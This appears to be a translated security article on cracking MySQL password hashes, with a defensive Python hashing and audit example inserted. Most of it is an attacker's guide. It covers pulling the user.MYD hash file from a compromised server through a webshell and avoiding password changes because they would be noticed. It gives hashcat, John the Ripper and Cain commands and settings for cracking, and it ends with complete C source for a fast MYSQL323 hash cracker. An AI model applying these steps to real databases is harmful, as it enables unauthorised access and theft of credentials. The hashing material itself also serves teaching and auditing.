Studying how MySQL stores and verifies passwords is of great significance in network attack and defense. Once an attacker has gained access to a site, recovering the passwords stored by MySQL lets them log in to the database through the normal channel: on the one hand to operate on the data directly, on the other hand as a step toward elevating privileges. This article studies and discusses the common methods of cracking MySQL passwords.
1. MySQL database password cracking
A MySQL user password, like the user passwords of other databases, appears in clear text in application code: once file-read permission has been obtained, it can be read directly from the database connection file. For example, an ASP connection file such as conn.asp generally contains the database type, physical location, user name and password. In MySQL, however, obtaining the password of a database user (other than root) only allows operating on the data of that one user's database.
In the actual attack and defense process, once a webshell has been obtained, it is possible to download the user.MYD file that MySQL uses to keep its users. This file stores the password hashes of all database users; whoever can crack these hashes can operate on the data in the normal, legitimate way. There are many online guides for modifying a MySQL user's password, but that is not advisable, because changing a user's password is easily noticed!
1.1 MySQL encryption method
MySQL authenticates passwords in one of two ways: versions before MySQL 4.1 use MYSQL323 hashing, and MySQL 4.1 and later use MYSQLSHA1 hashing. The server provides the built-in functions OLD_PASSWORD(str) and PASSWORD(str), which can be queried directly in the database; the former produces the MYSQL323 form and the latter the MYSQLSHA1 form.
(1) Hashing in MYSQL323 mode
SELECT OLD_PASSWORD('bbs.antian365.com');
Query result: mysql323 = 10c886615b135b38
(2) Hashing in MYSQLSHA1 mode
SELECT PASSWORD('bbs.antian365.com');
Query result: mysqlsha1 = *A2EBAE36132928537ADA8E6D1F7C5C5886713CC2
As the results show, MYSQL323 hashing produces a 16-character hex string, whereas MYSQLSHA1 produces a 41-character string. The leading "*" is not part of the actual hash computation; many users copy it along with the hash, but in actual cracking the "*" is removed, so the real length of a MYSQLSHA1 hash is 40 characters.
Figure 1 Querying the two hash values of the same password in MySQL
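The following Python code is an added example, not part of the original article: it reimplements the two hash functions described above, OLD_PASSWORD() (MYSQL323) and PASSWORD() (MYSQLSHA1), following the algorithms in MySQL's own source, adds a small classifier for the 16-, 40- and 41-character forms that the note about the leading "*" is concerned with, and shows a check a DBA can run over mysql.user rows: because neither scheme uses a salt, identical hashes mean identical passwords. The function names, the sample rows and the password "mypass" are the example's own assumptions; the expected OLD_PASSWORD("mypass") value is the one the MySQL reference manual lists.

```python
"""Compute MySQL's two legacy password hashes and classify a stored hash.

Added example, not from the original article. Implements the pre-4.1
OLD_PASSWORD() algorithm (MYSQL323) and the 4.1+ PASSWORD() algorithm
(MYSQLSHA1, the mysql_native_password scheme). Helper names below are
this example's own, not MySQL API names.
"""
import hashlib
from collections import defaultdict

MASK31 = 0x7FFFFFFF


def mysql323(password: str) -> str:
    """OLD_PASSWORD(): two 31-bit mixing registers, no salt, 16 hex chars.

    MySQL's hash_password() skips spaces and tabs in the password and
    masks each register to 31 bits at the end.
    """
    nr, nr2, add = 1345345333, 0x12345671, 7
    for ch in password.encode("utf-8"):
        if ch in (0x20, 0x09):   # spaces and tabs are ignored by MySQL
            continue
        nr ^= (((nr & 63) + add) * ch) + (nr << 8)
        nr2 += (nr2 << 8) ^ nr
        add += ch
        nr &= 0xFFFFFFFF         # keep 32-bit C arithmetic semantics
        nr2 &= 0xFFFFFFFF
    return "%08x%08x" % (nr & MASK31, nr2 & MASK31)


def mysql_native_password(password: str) -> str:
    """PASSWORD() in MySQL 4.1+: '*' + uppercase hex of SHA1(SHA1(pw)).

    Still unsalted: the same password always yields the same hash.
    """
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def classify_hash(stored: str) -> str:
    """Tell which scheme a value copied out of mysql.user belongs to.

    Returns 'mysql323', 'mysqlsha1' or 'unknown'. Accepts the 41-char
    form with the leading '*' and the 40-char form without it.
    """
    h = stored.strip()
    if h.startswith("*"):
        h = h[1:]
    if not h or any(c not in "0123456789abcdefABCDEF" for c in h):
        return "unknown"
    if len(h) == 16:
        return "mysql323"
    if len(h) == 40:
        return "mysqlsha1"
    return "unknown"


def find_shared_hashes(rows):
    """Group accounts that share a hash (and therefore a password).

    `rows` is an iterable of (user, host, hash). Returns only the groups
    with more than one account; no cracking is involved.
    """
    groups = defaultdict(list)
    for user, host, h in rows:
        groups[h.upper()].append(f"{user}@{host}")
    return {h: accts for h, accts in groups.items() if len(accts) > 1}


# Constructed sample rows in the shape of mysql.user (not real data).
SAMPLE_ROWS = [
    ("root", "localhost", mysql_native_password("mypass")),
    ("app", "10.0.0.%", mysql_native_password("mypass")),
    ("report", "localhost", mysql_native_password("s3parate")),
    ("legacy", "localhost", mysql323("mypass")),   # pre-4.1 style row
]

if __name__ == "__main__":
    print("OLD_PASSWORD('mypass') =", mysql323("mypass"))
    print("PASSWORD('mypass')     =", mysql_native_password("mypass"))
    for user, host, h in SAMPLE_ROWS:
        print(f"{user}@{host}: {h} -> {classify_hash(h)}")
    print("accounts sharing a password:", find_shared_hashes(SAMPLE_ROWS))
```

The 16-character legacy hash is the weak case discussed later in the article, and a row whose hash classify_hash() reports as mysql323 is the one a DBA should migrate first. The shared-hash check is a direct consequence of the missing salt in both schemes.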
1.2 MySQL database file structure
1. MySQL database file types
A MySQL table is stored in three kinds of files: ".frm", ".MYD" and ".MYI". ".frm" describes the structure of the table, ".MYD" is the table's data file, and ".MYI" holds the index tree for the data in the table. Each database normally has its own folder, by default under the path "C:\Program Files\MySQL\MySQL Server 5.0\data".
2. MySQL database user password file
All settings of the MySQL server itself are saved by default in "C:\Program Files\MySQL\MySQL Server 5.0\data\mysql", the data directory of the installation, as shown in Figure 2. The user table consists of three files, user.frm, user.MYD and user.MYI; the password hashes of all MySQL users, root included, are stored in user.MYD.
Figure 2 MySQL database user password file
1.3 Getting the MySQL password hash value
1. Get the hashed password string of a MySQL user
Open the user.MYD file directly in the UltraEdit-32 editor, using binary (hex) view, as shown in Figure 3. After the root user name there is a string of characters; select it and copy it into Notepad. This string is the user's hashed password value, here 506d1427f6f61696b4501445c90624897266dae3. Note:
(1) The "*" after root is not copied as part of the string.
(2) In some cases you need to look further back in the file, otherwise you will not get the complete MYSQLSHA1 hash; in short, the correct length is 40 characters.
(3) If you crack the hash with John the Ripper, the "*" must be included!
Figure 3 Getting the hashed string
1.4 Online password cracking websites
1. Cracking with cmd5.com. Submit the MySQL hash to the cmd5.com website for lookup. MySQL password cracking there is generally charged; a successful crack costs 0.1 yuan.
2. Cracking with somd5.com. somd5.com is a free cracking website; each lookup requires manually solving a graphical captcha. It is fast and gives good results, but it accepts only one hash at a time and the captcha has to be re-entered after each one.
1.5 Cracking with hashcat
Hashcat supports a large number of hash algorithms and is free, open-source software; the official website is https://hashcat.net/hashcat/. The crack commands are (the -m value selects the hash mode: 200 is MySQL323, 300 is MySQL4.1/MySQL5):
hashcat64.exe -m 200 mysql.hash pass.dict    // crack MySQL323-type hashes
hashcat64.exe -m 300 mysql.hash pass.dict    // crack MySQL4.1/MySQL5-type hashes
1.6 Cracking with John the Ripper
John the Ripper: http://www.openwall.com/john/h/john179w2.zip. Besides Linux passwords, John the Ripper can crack many other password formats. Cracking a MySQL password was tested under Kali, as shown in Figure 4.
echo "*81f5e21e35407d884a6cd4a731aebfb6af209e1b" > hashes.txt
john --format=mysql-sha1 hashes.txt
john --list=formats | grep -i mysql    // list the formats that support MySQL password cracking
Figure 4 Testing the MySQL password crack
1.7 Cracking the MySQL password with Cain
1. Add the MySQL user's password hash to the Cain cracking list
Cain & Abel is used here to crack the MySQL user password hash. Cain & Abel is a comprehensive tool that can crack screen-saver, PWL, shared, cached, remote-share and SMB passwords; it decodes VNC passwords, Cisco Type-7 passwords, Base64, SQL Server 7.0/2000 passwords, Remote Desktop passwords, Access database passwords, Cisco PIX firewall passwords, Cisco MD5 hashes, NTLM session security passwords, IKE aggressive-mode pre-shared keys and dial-up passwords; it can also crack remotely and supports both dictionary and brute-force attacks. Its sniffer is extremely powerful and can capture almost any account password, including FTP, HTTP, IMAP, POP3, SMB, TELNET, VNC, TDS, SMTP, MSKerb5-PreAuth, MSN, RADIUS keys, RADIUS users, ICQ and IKE aggressive-mode pre-shared key authentications.
The latest version of Cain & Abel at the time of writing is 4.9.56, available at http://www.oxid.it/downloads/ca_setup.exe. After downloading, install it directly and run it. In the Cain & Abel main interface, click the "Cracker" tab and add the hashed password string "506d1427f6f61696b4501445c90624897266dae3" to the MySQL Hashes cracking list, as shown in Figure 5: click "Add to list" (Figure 6) and paste the string into the hash input box. The user name can be anything.
Figure 5 Main interface when cracking the MySQL password with Cain
Figure 6 Adding MySQL hashes
2. Cracking with a dictionary
Select the string just added, then choose "Dictionary Attack" and select "MySQL SHA1 Hashes" in the pop-up menu. This applies to MySQL 4.1 and later; for versions before MySQL 4.1, select "MySQL v3.23 Hashes" instead.
Figure 7 Selecting the crack mode
Selecting "Dictionary Attack" opens a window mainly for choosing dictionaries, as shown in Figure 8. Right-click under "Dictionary" to add one or more dictionary files; after the dictionaries have been selected, set the desired "Options" and then click the "Start" button to begin cracking.
Figure 8 MySQL dictionary crack settings
Description
The "Options" section offers a total of 8 mangling methods:
(1) Capitalize the first letter of the string
(2) Reverse the string
(3) Double the string
(4) Convert the string to all lowercase
(5) Convert the string to all uppercase
(6) Append a number to the string
(7) Rotate the uppercase letter through each position of the string
(8) Append two numbers to the string
After a successful crack Cain reports a result such as:
PlainText of user <none> Is DatabasePassWord
Attack stopped!
1 of 1 hashes cracked
This indicates that the password behind the hash is "DatabasePassWord". Back in the main Cain cracking window, the cracked password is automatically filled into the "Password" column.
3. Crack discussion
(1) Dictionary cracking and dictionary strength
Click "Start" - "Programs" - "MySQL" - "MySQL Server 5.0" - "MySQL Command Line Client" to open the MySQL command line client; after entering the password, run the following statements to set a new password:
USE mysql;
UPDATE user SET Password=PASSWORD('1977-05-05') WHERE user='root'; FLUSH PRIVILEGES;
In this experiment the original password was changed to "1977-05-05".
Open C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.MYD again with UltraEdit-32 to get the new hash string "B046bbaf61fe3bb6f60ca99af39f5c2702f00d12", then select a dictionary again; in this case a generated birthday dictionary was chosen, with only the lowercase-string option selected, and the result came back quickly. The test shows that when Cain is used to crack a MySQL password by dictionary, the effectiveness depends on the strength of the dictionary: as long as the password is in the dictionary, it will be cracked.
(2) Cracking with rainbow tables
Cain can also crack MySQL hashes with rainbow tables: in the cracking mode choose "Cryptanalysis Attack" - "MySQL SHA1 Hashes via RainbowTables". In actual testing, however, the SHA1 rainbow tables available on the network are in RTI format while Cain uses RT format. Renaming the file suffix of all downloaded tables from RTI to RT and then attempting the crack gave a message that it was unsuccessful, presumably because the formats differ: Cain only recognises the tables it provides itself.
(3) Hash calculator
Cain can compute various hashes: click the calculator icon in the main interface to open the hash calculator, enter the original value to be converted in "Text to Hash", for example 12345678, and click "Calculate" to see the resulting hash values, as shown in the figure.
(4) Creating a rainbow table
Run Winrtgen directly from the Cain installation directory C:\Program Files\Cain\Winrtgen. This tool is a rainbow table generator that makes it easy to generate rainbow tables of various types.
(5) Rainbow table settings
Click "Add Table" and select "mysqlsha1" as the hash in "Rainbow Table properties". You can then set Min Len, Max Len, Index, Chain Len, Chain Count and "N of tables" according to the actual situation; normally you only need to set Min Len, Max Len and N of tables. "N of tables" mainly determines how completely the hash space is covered: enter different values and the table properties display the percentage. Work out how many tables you need to generate in total, click "Benchmark" for a time estimate, as shown in the figure, and click "OK" to complete the rainbow table generation settings.
In the Rainbow Table Builder, click "Start" to create the rainbow table; the status shows the size and progress of the build.
Figure Starting rainbow table creation
Because generating rainbow tables takes a long time, and no MySQL SHA1 rainbow tables in RT format were found on the network, this crack relies mainly on dictionaries; the rainbow tables can be used once they have all been generated. Where server permissions are not locked down tightly, the MySQL user.MYD file can be downloaded to the local machine through a webshell; once the root password is recovered, a great deal can be done with the webshell. This article has introduced cracking MySQL passwords through online sites, John the Ripper, hashcat and Cain; for MySQL passwords that are not designed to be very complex, cracking is still relatively easy.
(6) For 16-character MySQL hashes (the MYSQL323 algorithm) there is a fast cracking method: compile the following program and run it against the hash directly; it can recover 8-character passwords made of digits, letters and other characters.
How to use:
./mysqlfast 6294b50f67eda209
/* This program is public domain. Share and enjoy.
 *
 * $ gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast
 * $ mysqlfast 6294b50f67eda209
 * Hash: 6294b50f67eda209
 */
#include <stdio.h>

typedef unsigned long u32;

/* Allowable characters in password; 33-126 is printable ASCII */
#define MIN_CHAR 33
#define MAX_CHAR 126

/* Maximum length of password */
#define MAX_LEN 12

/* The MYSQL323 hash keeps only the low 31 bits of each register */
#define MASK 0x7fffffffL

/* Enumerate the first stop+1 characters and solve algebraically for the
 * last three. targ1/targ2 are the two hash halves (targ2 already unwound
 * by crack()). Returns 1 and fills pass_ary on success, 0 otherwise. */
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
  int i, c;
  u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
  u32 newstate1, newstate2, newstate3;
  u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
  u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];

  i = -1;
  sum = 7;
  state1_ary[0] = 1345345333L;
  state2_ary[0] = 0x12345671L;

  while (1) {
    /* extend the prefix with MIN_CHAR until stop+1 characters are fixed */
    while (i < stop) {
      i++;
      pass_ary[i] = MIN_CHAR;
      step_ary[i] = (state1_ary[i] & 0x3f) + sum;
      xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
      sum += MIN_CHAR;
      state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
      state2_ary[i+1] = state2_ary[i]
        + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
    }

    state1 = state1_ary[i+1];
    state2 = state2_ary[i+1];
    step = (state1 & 0x3f) + sum;
    xor1 = step*MIN_CHAR + (state1 << 8);
    xor2 = (state2 << 8) ^ state1;

    /* try every value of the next character and solve for the last two */
    for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
      newstate2 = state2 + (xor1 ^ xor2);
      newstate1 = state1 ^ xor1;

      newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
      div = (newstate1 & 0x3f) + sum + c;
      diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
      if (diff % div != 0) continue;
      d = diff / div;
      if (d < MIN_CHAR || d > MAX_CHAR) continue;

      div = (newstate3 & 0x3f) + sum + c + d;
      diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
      if (diff % div != 0) continue;
      e = diff / div;
      if (e < MIN_CHAR || e > MAX_CHAR) continue;

      pass_ary[i+1] = c;
      pass_ary[i+2] = d;
      pass_ary[i+3] = e;
      return 1;
    }

    /* backtrack: advance the last prefix character that can still grow */
    while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
      sum -= MAX_CHAR;
      i--;
    }
    if (i < 0) break;
    pass_ary[i]++;
    xor_ary[i] += step_ary[i];
    sum++;
    state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
    state2_ary[i+1] = state2_ary[i]
      + ((state2_ary[i] << 8) ^ state1_ary[i+1]);
  }

  return 0;
}

void crack(char *hash)
{
  int i, len;
  u32 targ1, targ2, targ3;
  int pass[MAX_LEN];

  if (sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2) {
    printf("Invalid password hash: %s\n", hash);
    return;
  }
  printf("Hash: %08lx%08lx\n", targ1, targ2);

  /* unwind the second register so crack0() can solve for the tail */
  targ3 = targ2 - targ1;
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);
  targ3 = targ2 - ((targ3 << 8) ^ targ1);

  for (len = 3; len <= MAX_LEN; len++) {
    printf("Trying length %d\n", len);
    if (crack0(len-4, targ1, targ3, pass)) {
      printf("Found pass: ");
      for (i = 0; i < len; i++)
        putchar(pass[i]);
      putchar('\n');
      break;
    }
  }

  if (len > MAX_LEN)
    printf("Pass not found\n");
}

int main(int argc, char *argv[])
{
  int i;
  if (argc <= 1)
    printf("usage: %s hash\n", argv[0]);
  for (i = 1; i < argc; i++)
    crack(argv[i]);
  return 0;
}